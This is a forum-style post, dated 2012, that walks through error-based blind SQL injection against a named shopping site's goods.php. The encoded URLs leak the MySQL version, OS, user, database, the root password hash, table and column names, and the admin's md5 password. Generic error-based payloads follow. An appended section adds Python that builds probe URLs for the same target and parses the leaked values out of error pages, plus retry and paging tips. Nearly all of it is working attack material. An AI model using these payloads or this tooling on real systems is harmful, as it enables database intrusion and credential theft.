
Blind injection details

Posted 2012-9-5 14:59:30
Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash (Password column of mysql.user)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

user_name column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

password column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Get the admin password (md5)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
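Every payload in the post relies on the same trick: GROUP BY over a key built from floor(rand()*2) makes MySQL raise "Duplicate entry '<value>:1' for key 'group_key'", and the leaked value rides along in that error text. The helpers below, added by the editor and not part of the original post, do the three things a practitioner needs around that trick: build a probe URL in the post's shape (the base URL is the one quoted in the post), pull the leaked value out of a response that echoes the MySQL error (the response body here is a constructed sample, not real output), and model why the error fires at all. The model encodes the accepted explanation of the bug: the group key is evaluated once to look it up in the temporary table and again when the missed group is inserted, so a key that changes between the two evaluations can collide with one already present. RAND0_PREFIX holds the first six values of floor(rand(0)*2) under MySQL's fixed seed; the 'group_key' / '<group_key>' key names cover 5.x and 8.0 respectively.

```python
"""Helpers for the floor(rand()*2) + GROUP BY error-based MySQL injection
used throughout the post above (added example code, not the original poster's;
the target URL is the one quoted in the post)."""
import html
import random
import re
import urllib.parse
from typing import Iterator, Optional

# Base request taken from the post; everything after "wsid=1" is injected.
BASE_URL = "http://www.baiud.com/goods.php?id=352&wsid=1"

# First six values of floor(rand(0)*2) in MySQL. The seed fixes the sequence,
# which is what makes the rand(0) variant of the payload deterministic.
RAND0_PREFIX = [0, 1, 1, 0, 1, 1]


def build_payload(expr: str, source: str = "information_schema.tables",
                  seeded: bool = True, base: str = BASE_URL) -> str:
    """Build one probe URL in the post's shape.

    expr    - SQL expression whose value should leak (e.g. "@@version")
    source  - table the outer SELECT groups over; needs at least 3 rows for
              rand(0) to fail reliably (information_schema.tables always has)
    seeded  - rand(0) (deterministic) or rand() (as in the post, probabilistic)
    """
    rnd = "rand(0)" if seeded else "rand()"
    sql = (f" and (1,1)>(select count(*),concat(({expr}),0x3a,floor({rnd}*2)) x "
           f"from {source} group by x limit 1)#")
    # Leave the characters the post leaves raw; space -> %20, > -> %3E, # -> %23.
    return base + urllib.parse.quote(sql, safe="()*,=@")


# The key is concat(<value>, ':', 0|1); 'group_key' is the 5.x name, '<group_key>' the 8.0 name.
DUP_RE = re.compile(r"Duplicate entry '(.+):[01]' for key '<?group_key>?'")


def extract_leak(body: str) -> Optional[str]:
    """Return the leaked value from an echoed MySQL duplicate-key error,
    or None when the page shows no such error (probe missed, or errors hidden).
    HTML entities are decoded first because PHP pages often escape the quotes."""
    m = DUP_RE.search(html.unescape(body))
    return m.group(1) if m else None


def simulate_group_by(rows: int, key_values: Iterator[int]) -> Optional[int]:
    """Model of why GROUP BY on a non-deterministic key raises a duplicate-entry error.

    The key is evaluated once to probe the temporary table and, on a miss,
    evaluated again while the new group row is inserted. Returns the 1-based
    row number at which the inserted key collides, or None if grouping succeeds.
    """
    seen = set()
    for row in range(1, rows + 1):
        probe = next(key_values)
        if probe in seen:
            continue                      # group exists: counter incremented only
        inserted = next(key_values)       # re-evaluated on insert
        if inserted in seen:
            return row                    # Duplicate entry '...' for key 'group_key'
        seen.add(inserted)
    return None


def error_rate(rows: int, trials: int = 4000, seed: int = 1) -> float:
    """Fraction of trials in which the unseeded rand() variant errors (fixed RNG seed
    so the estimate is reproducible)."""
    rng = random.Random(seed)

    def keys() -> Iterator[int]:
        while True:
            yield rng.randrange(2)

    hits = sum(simulate_group_by(rows, keys()) is not None for _ in range(trials))
    return hits / trials


# Constructed sample of a PHP page echoing the MySQL error (not real output).
SAMPLE_BODY = ("<b>Warning</b>: mysql_fetch_array(): ... Duplicate entry "
               "&#039;5.1.73-log:1&#039; for key &#039;group_key&#039; in goods.php")

if __name__ == "__main__":
    print(build_payload("@@version"))
    print("leaked:", extract_leak(SAMPLE_BODY))
    print("rand(0) over 2 rows errors at row:", simulate_group_by(2, iter(RAND0_PREFIX)))
    print("rand(0) over 3 rows errors at row:", simulate_group_by(3, iter(RAND0_PREFIX)))
    print("rand() over 2 rows, empirical error rate:", error_rate(2))
```

Two caveats follow directly from the model. The post's own payloads use unseeded rand() over a two-row derived table, so the error is probabilistic (about one request in four in the model) and a probe that returns a normal page has to be repeated; rand(0) over information_schema.tables fails on the third row every time, which is why the error-based examples at the end of the post use it. Only a limited prefix of the key appears in the error message, so long values such as hashes should be paged through with substr().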